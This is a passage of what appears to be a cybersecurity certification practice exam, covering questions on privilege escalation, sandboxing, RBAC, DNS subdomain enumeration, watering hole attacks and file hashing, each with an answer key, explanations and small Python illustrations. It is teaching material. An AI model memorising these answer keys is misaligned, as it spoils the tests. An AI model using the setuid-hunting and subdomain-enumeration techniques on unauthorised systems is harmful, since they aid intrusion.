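One of these checks is simple enough to sketch: hunting for setuid binaries, which execute with the file owner's privileges regardless of who runs them. A minimal Python version, roughly equivalent to `find / -perm -4000` (the directory walked is whatever root the tester chooses):

```python
import os
import stat

def find_suid_files(root):
    """Walk `root` and return paths whose mode has the setuid bit set --
    a classic local privilege-escalation enumeration step."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                mode = os.stat(path).st_mode
            except OSError:
                continue  # broken links or permission errors: skip
            if mode & stat.S_ISUID:
                hits.append(path)
    return hits
```

Any unexpected setuid binary, especially a custom or outdated one, becomes a candidate for escalation to the owner's (often root's) privileges.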

Successful privilege escalation dramatically increases attack impact, allowing installation of persistent malware, creation of backdoor accounts, access to all data, system-wide configuration changes, and potential lateral movement to other networked systems.

Why other options are incorrect:

A) Lateral movement involves moving from one compromised system to other systems in the network. This typically occurs after privilege escalation, once administrative access is established and credentials or techniques for accessing other systems are obtained.

C) Data exfiltration is the process of stealing and transmitting data outside the organization. This typically occurs later in the attack lifecycle, after gaining sufficient privileges to access valuable data and establishing methods to extract it without detection.

D) Covering tracks involves hiding evidence of compromise by deleting logs, removing artifacts, and eliminating traces of malicious activity. This is typically one of the final phases, performed after achieving objectives to avoid detection and maintain access.

Question 56

A security team wants to implement a solution that isolates untrusted code execution and prevents malware from accessing the underlying operating system. Which technology should be deployed?

A) Virtual Private Network (VPN)

B) Firewall

C) Sandboxing

D) Intrusion Detection System (IDS)

Answer: C

Explanation:

Protecting systems from malicious code requires isolation mechanisms that prevent untrusted software from damaging the host environment. Sandboxing is specifically designed to execute potentially malicious code in an isolated environment, preventing it from accessing or affecting the underlying operating system and other applications.

Sandboxing creates a controlled, restricted execution environment with limited access to system resources, file systems, network connections, and other processes. When suspicious files or applications run in a sandbox, any malicious actions are contained within that isolated space, protecting the host system from compromise.

Modern sandboxing implementations use various isolation techniques: virtualization-based sandboxes create lightweight virtual machines for each untrusted process; container-based sandboxes use operating system-level virtualization for isolation; application-level sandboxes restrict specific programs through security policies; and browser sandboxes isolate web content rendering from the operating system.
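The core idea, running untrusted code in a separate, constrained process, can be illustrated at a very small scale with Python's `subprocess`. This is only a sketch of the isolation concept (a wall-clock limit and a stripped environment); production sandboxes add syscall filtering, namespaces, or full virtualization:

```python
import subprocess
import sys

def run_untrusted(code, timeout=2):
    """Run a Python snippet in a separate process with a time limit and an
    empty environment. Minimal illustration only -- not a real sandbox."""
    try:
        result = subprocess.run(
            [sys.executable, "-I", "-c", code],  # -I: Python isolated mode
            capture_output=True,
            text=True,
            timeout=timeout,
            env={},  # child inherits no environment variables
        )
        return ("finished", result.stdout)
    except subprocess.TimeoutExpired:
        return ("killed", None)  # runaway code is terminated at the limit

print(run_untrusted("print('hello from the child process')"))
print(run_untrusted("while True: pass", timeout=1))
```

Even this toy version shows the defining property of a sandbox: misbehavior in the contained process (here, an infinite loop) is terminated without affecting the host.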

Security benefits include: malware analysis—security researchers can safely analyze malware behavior without risking infection; zero-day protection—sandboxing provides defense against unknown threats that signatures can’t detect; safe browsing—web browsers use sandboxes to isolate potentially malicious websites; email attachment protection—organizations sandbox email attachments before delivery; and application testing—developers test untrusted code safely before deployment.

Enterprise sandboxing solutions monitor sandboxed processes for suspicious behaviors like file encryption, registry modifications, network communications to command-and-control servers, or privilege escalation attempts. Based on observed behavior, systems can block or quarantine threats.

Why other options are incorrect:

A) VPN creates encrypted tunnels for secure remote network access, protecting data in transit from eavesdropping. VPNs don’t isolate code execution or prevent malware from accessing operating systems—they address network security rather than endpoint protection.

B) Firewalls filter network traffic based on rules, blocking unauthorized connections and controlling which services are accessible. While firewalls prevent network-based attacks, they don’t isolate code execution or stop malware already on the system from accessing local resources.

D) IDS monitors network traffic and system activity for suspicious patterns, generating alerts when potential attacks are detected. IDS is passive detection technology that doesn’t isolate code execution or prevent malware from running—it only identifies threats after they occur.

Question 57

An organization implements a policy where access rights are granted based on job responsibilities and the principle of least privilege. Which access control model is being used?

A) Mandatory Access Control (MAC)

B) Discretionary Access Control (DAC)

C) Role-Based Access Control (RBAC)

D) Attribute-Based Access Control (ABAC)

Answer: C

Explanation:

Access control models define how permissions are assigned and enforced within information systems. When access rights are granted based on job responsibilities and the principle of least privilege, the organization is implementing Role-Based Access Control (RBAC), one of the most widely adopted access control models in enterprise environments.

RBAC assigns permissions to roles rather than individual users, and users are then assigned to roles based on their job functions and responsibilities. This approach simplifies access management, improves security consistency, and ensures users have exactly the permissions needed to perform their duties without excessive privileges.

The RBAC model operates on key principles: roles represent job functions (like “Accountant,” “HR Manager,” “Database Administrator”), each role has specific permissions associated with business responsibilities; users are assigned to roles based on their organizational position; permissions are granted to roles rather than individuals; and principle of least privilege ensures roles contain only minimum necessary permissions.

Implementation benefits include: simplified administration—adding new employees means assigning appropriate roles rather than configuring individual permissions; improved security—consistent permission sets reduce errors and unauthorized access; easier auditing—reviewing role definitions is simpler than checking individual user permissions; separation of duties—conflicting responsibilities can be separated across different roles; and scalability—organizations can manage thousands of users efficiently through standardized roles.

For example, all accountants receive the same permissions by being assigned to the “Accountant” role, which includes access to financial systems, reporting tools, and relevant documents, but excludes HR data, development tools, or administrative functions outside their job scope.
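The role-indirection at the heart of RBAC fits in a few lines. A minimal sketch (role names, permission names, and users are all illustrative):

```python
# Permissions attach to roles; users attach to roles, never directly to
# permissions. Keeping each role's set minimal enforces least privilege.
ROLE_PERMISSIONS = {
    "accountant": {"read_ledger", "run_financial_reports"},
    "hr_manager": {"read_hr_records", "approve_leave"},
    "dba":        {"read_ledger", "manage_database"},
}

USER_ROLES = {
    "alice": {"accountant"},
    "bob":   {"accountant", "dba"},
}

def is_authorized(user, permission):
    """A user is authorized only if one of their roles grants the permission."""
    return any(
        permission in ROLE_PERMISSIONS.get(role, set())
        for role in USER_ROLES.get(user, set())
    )

print(is_authorized("alice", "read_ledger"))      # True: via 'accountant'
print(is_authorized("alice", "read_hr_records"))  # False: outside her role
```

Onboarding, offboarding, and audits all reduce to editing or reviewing the two small mappings, rather than per-user permission lists.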

Why other options are incorrect:

A) MAC uses security labels and clearance levels enforced by the system, typically in military and government environments. Access decisions are based on data classification (Top Secret, Secret, Confidential) and user clearance levels, not job responsibilities.

B) DAC allows data owners to control access to their resources at their discretion. Users can grant or revoke permissions to files they own, which doesn’t align with centralized, role-based administration or systematic least privilege enforcement.

D) ABAC makes access decisions based on multiple attributes (user attributes, resource attributes, environmental conditions) evaluated through policies. While flexible and granular, it’s more complex than role-based assignment and isn’t specifically tied to job responsibilities as the primary access determinant.

Question 58

A penetration tester wants to identify all subdomains of a target domain to discover potential attack surfaces. Which reconnaissance technique is most appropriate?

A) Port scanning

B) DNS enumeration

C) Vulnerability scanning

D) Network sniffing

Answer: B

Explanation:

Reconnaissance is the critical first phase of penetration testing where ethical hackers gather information about targets to identify potential attack vectors. For discovering subdomains and understanding the domain structure of an organization, DNS enumeration is the most appropriate and effective technique.

DNS enumeration involves querying Domain Name System records to discover information about a target’s infrastructure, including subdomains, mail servers, name servers, and IP addresses. Subdomains often represent different services, departments, or systems (like mail.example.com, dev.example.com, vpn.example.com, admin.example.com) that may have varying security postures.

Common DNS enumeration techniques include: DNS zone transfers (requesting complete zone files from misconfigured DNS servers), brute-force subdomain discovery (testing common subdomain names from wordlists), DNS record queries (querying A, AAAA, MX, TXT, NS, SOA records), reverse DNS lookups (finding domain names associated with IP addresses), and certificate transparency logs (examining SSL certificate records that list subdomains).
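The brute-force technique in particular is easy to sketch. In the version below the resolver is injected as a callable so the logic can be demonstrated without live DNS queries; in practice it would wrap `socket.gethostbyname` or a library such as dnspython, and the wordlist would be far larger (all names and addresses here are illustrative):

```python
WORDLIST = ["www", "mail", "dev", "vpn", "admin", "staging"]

def enumerate_subdomains(domain, resolve, wordlist=WORDLIST):
    """Return {subdomain: ip} for every candidate that resolves.
    `resolve(name)` should return an IP string or raise OSError,
    mirroring socket.gethostbyname's behavior."""
    found = {}
    for word in wordlist:
        candidate = f"{word}.{domain}"
        try:
            found[candidate] = resolve(candidate)
        except OSError:
            pass  # NXDOMAIN / resolution failure: not a live subdomain
    return found

# Simulated DNS zone standing in for live lookups.
FAKE_ZONE = {"www.example.com": "192.0.2.1", "dev.example.com": "192.0.2.7"}

def fake_resolve(name):
    if name in FAKE_ZONE:
        return FAKE_ZONE[name]
    raise OSError("NXDOMAIN")

print(enumerate_subdomains("example.com", fake_resolve))
```

Real tooling layers rate limiting, wildcard detection, and multiple data sources on top of this same candidate-and-resolve loop.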

Popular tools for DNS enumeration include: dnsrecon, dnsenum, fierce, sublist3r, amass, and subfinder. These tools automate the discovery process, querying multiple sources including search engines, certificate databases, DNS servers, and threat intelligence platforms.

Discovering subdomains is valuable because: development and staging environments often have weaker security than production; forgotten or abandoned subdomains may contain vulnerabilities; administrative interfaces might be exposed on subdomains; different subdomains may run different software versions with varying vulnerability profiles; and comprehensive subdomain mapping reveals the attack surface extent.

Why other options are incorrect:

A) Port scanning identifies open ports and services on known IP addresses or hostnames. While valuable for reconnaissance, it doesn’t discover subdomains—you need to know target addresses first before scanning them. Port scanning occurs after subdomain discovery.

C) Vulnerability scanning uses automated tools to identify security weaknesses in known systems. Like port scanning, this requires knowing target systems first. Vulnerability scanning is an assessment technique that follows reconnaissance phases like subdomain discovery.

D) Network sniffing captures and analyzes network traffic packets to understand communications, protocols, and potentially sensitive data. Sniffing requires network access and doesn’t actively discover subdomains—it passively observes traffic that happens to pass through the monitored network segment.

Question 59

An attacker compromises a legitimate website and injects malicious code that attacks visitors’ browsers. What type of attack is this?

A) Phishing

B) Watering hole attack

C) Drive-by download

D) Man-in-the-browser attack

Answer: B

Explanation:

Cyber attacks use various strategies to compromise targets, with some focusing on trusted intermediary platforms rather than direct targeting. When attackers compromise legitimate websites frequented by their intended victims and inject malicious code to attack visitors, this represents a watering hole attack, named after predators waiting at watering holes where prey naturally congregate.

Watering hole attacks involve sophisticated, multi-stage operations: first, attackers identify websites regularly visited by target organizations or user groups through reconnaissance (industry forums, professional association sites, news outlets, supplier portals); second, attackers compromise these trusted websites by exploiting vulnerabilities in content management systems, web applications, or hosting infrastructure; third, malicious code is injected into legitimate web pages; finally, when target users visit the compromised site, the malicious code exploits browser vulnerabilities, delivers malware, or harvests credentials.

The attack strategy is particularly effective because: trust exploitation—victims trust familiar websites and are less suspicious of content; targeted approach—attackers reach specific user groups efficiently; bypassing defenses—legitimate websites are typically whitelisted in security controls; scale advantage—one compromised site can infect numerous visitors; and reduced attribution—attacks appear to originate from legitimate infrastructure.

Real-world examples include attacks on Forbes.com, Department of Labor websites, and various industry-specific platforms. Attackers often use browser exploit kits that automatically test visitors for vulnerabilities and deliver appropriate exploits.

Defense strategies include: keeping browsers and plugins updated, using browser isolation technologies, implementing web filtering with reputation analysis, deploying endpoint detection and response (EDR) solutions, and conducting security awareness training about risks even on trusted sites.

Why other options are incorrect:

A) Phishing involves fraudulent communications (typically emails) impersonating trusted entities to steal credentials or deliver malware. Phishing doesn’t involve compromising legitimate websites—it creates fake communications or fake websites that impersonate legitimate ones.

C) Drive-by downloads refer to automatic malware downloads when visiting compromised websites, often without user interaction. While watering hole attacks may use drive-by download techniques, the term doesn’t capture the strategic element of targeting specific user groups through carefully selected legitimate websites.

D) Man-in-the-browser attacks inject malicious code into victims’ browsers to intercept and manipulate web transactions in real-time. This is typically accomplished through malware already on the victim’s system, not by compromising legitimate websites that users visit.

Question 60

A security professional needs to verify that a downloaded file has not been tampered with during transmission. Which cryptographic function should be used?

A) Symmetric encryption

B) Asymmetric encryption

C) Digital signature

D) Hashing algorithm

Answer: D

Explanation:

Ensuring data integrity during file transfers is critical for security, especially when downloading software, patches, or sensitive documents. Hashing algorithms provide the most appropriate cryptographic function for verifying that files have not been tampered with or corrupted during transmission.

Hashing algorithms (also called hash functions) take input data of any size and produce a fixed-length output called a hash value, message digest, or checksum. The key properties that make hashing ideal for integrity verification include: deterministic—the same input always produces the same hash; one-way function—computationally infeasible to reverse the hash back to original data; avalanche effect—tiny input changes produce drastically different hashes; collision resistance—extremely difficult to find two different inputs producing the same hash; and fixed output size—regardless of input size, hash length remains constant.

Common hashing algorithms include MD5 (128-bit, deprecated due to collision vulnerabilities), SHA-1 (160-bit, being phased out), SHA-256 (256-bit, currently recommended), and SHA-3 (various sizes, latest standard). Security-conscious organizations now prefer SHA-256 or stronger algorithms.

The integrity verification process works as follows: the original file publisher computes the hash of the file and publishes it on their website or includes it in documentation; users download both the file and the published hash value; after downloading, users compute the hash of their downloaded file using the same algorithm; if computed hash matches the published hash, the file is intact and unmodified; any difference indicates tampering, corruption, or download errors.

This technique is widely used for verifying software downloads, operating system images, firmware updates, and any scenario where data integrity must be confirmed. Popular tools for hash verification include sha256sum, certutil, and various GUI applications.

Why other options are incorrect:

A) Symmetric encryption uses the same key for encryption and decryption, protecting confidentiality by making data unreadable without the key. While encryption prevents tampering observation, it doesn’t provide integrity verification—encrypted data could be modified, and without additional integrity mechanisms, recipients wouldn’t detect changes.

B) Asymmetric encryption uses key pairs (public and private keys) for encryption and decryption. Like symmetric encryption, it primarily provides confidentiality. While some asymmetric schemes can provide integrity through digital signatures, asymmetric encryption alone doesn’t verify integrity.

C) Digital signatures combine hashing with asymmetric cryptography to provide authentication, integrity, and non-repudiation. While digital signatures do verify integrity, they’re more complex than simple hashing and require public key infrastructure. When only integrity verification is needed (not authentication), simple hashing is more appropriate and efficient.

 
